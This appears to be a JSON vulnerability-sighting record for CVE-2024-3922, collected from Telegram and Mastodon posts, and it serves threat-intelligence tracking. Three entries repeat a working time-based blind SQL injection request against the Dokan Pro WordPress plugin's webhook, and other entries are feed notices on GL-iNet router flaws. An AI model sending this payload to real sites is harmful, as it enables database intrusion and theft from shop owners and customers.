{"vulnerability": "CVE-2024-3922", "sightings": [{"uuid": "dc076036-2967-40f1-87a0-f83e5b45940e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-3922", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/11166", "content": "Dokan Pro SQL-CVE-2024-3922\n\nPOST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1\nHost: 127.0.0.1\n\n{\"env\":\"1\",\"event\":\"invoice.created\",\"resource\":{\"subscription_code\":\"11111' and (select 1 from (select sleep( if(1=1,6,0) ))x )='\"}}\n\n#exploit  #poc", "creation_timestamp": "2024-07-05T05:17:28.000000Z"}, {"uuid": "6971f76a-e4d1-4797-9eb0-89c4762797b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39227", "type": "seen", "source": "https://t.me/cvedetector/2623", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-39227 - GL-iNet Router Shell Injection Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-39227 \nPublished : Aug. 6, 2024, 5:15 p.m. | 36\u00a0minutes ago \nDescription : GL-iNet products AR750/AR750S/AR300M/AR300M16/MT300N-V2/B1300/MT1300/SFT1200/X750 v4.3.11, MT3000/MT2500/AXT1800/AX1800/A1300/X300B v4.5.16, XE300 v4.3.16, E750 v4.3.12, AP1300/S1300 v4.3.13, and XE3000/X3000 v4.4 were discovered to contain a shell injection vulnerability via the interface check_ovpn_client_config. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"06 Aug 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-08-06T20:02:43.000000Z"}, {"uuid": "18e8d46a-3293-4fce-b896-b42346e4eab1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39229", "type": "seen", "source": "https://t.me/cvedetector/2620", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-39229 - GL-iNet DNS Rebinding Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-39229 \nPublished : Aug. 6, 2024, 5:15 p.m. | 36\u00a0minutes ago \nDescription : An issue in GL-iNet products AR750/AR750S/AR300M/AR300M16/MT300N-V2/B1300/MT1300/SFT1200/X750 v4.3.11, MT3000/MT2500/AXT1800/AX1800/A1300/X300B v4.5.16, XE300 v4.3.16, E750 v4.3.12, AP1300/S1300 v4.3.13, XE3000/X3000 v4, and B2200/MV1000/MV1000W/USB150/N300/SF1200 v3.216 allows attackers to intercept communications via a man-in-the-middle attack when DDNS clients are reporting data to the server. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"06 Aug 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-08-06T20:02:40.000000Z"}, {"uuid": "581382ab-4c3e-4896-a6c0-df076170bf04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-3922", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1143", "content": "Dokan Pro SQL-CVE-2024-3922\n\nPOST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1\nHost: 127.0.0.1\n\n{\"env\":\"1\",\"event\":\"invoice.created\",\"resource\":{\"subscription_code\":\"11111' and (select 1 from (select sleep( if(1=1,6,0) ))x )='\"}}\n\n#exploit  #poc", "creation_timestamp": "2024-07-05T05:17:28.000000Z"}, {"uuid": "f3998459-8547-4cfe-8f42-fd25eb23d2c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-3922", "type": "exploited", "source": "https://t.me/CNArsenal/2746", "content": "Dokan Pro SQL-CVE-2024-3922\n\nPOST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1\nHost: 127.0.0.1\n\n{\"env\":\"1\",\"event\":\"invoice.created\",\"resource\":{\"subscription_code\":\"11111' and (select 1 from (select sleep( if(1=1,6,0) ))x )='\"}}\n\n#exploit  #poc", "creation_timestamp": "2024-07-14T00:20:28.000000Z"}, {"uuid": "e93d0f46-9b7b-4d4a-98cf-2dd2af90538d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-3922", "type": "exploited", "source": "Telegram/pkydkwnmzDPXwvLoeDS_lr1nvikknfAe2bWtgf1Cx7pI61Uq", "content": "", "creation_timestamp": "2024-07-05T05:08:15.000000Z"}, {"uuid": "bb7c60bb-72f1-46e9-872b-86aeb3154c84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39226", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114490845618304857", "content": "", "creation_timestamp": "2025-05-11T19:27:43.609779Z"}]}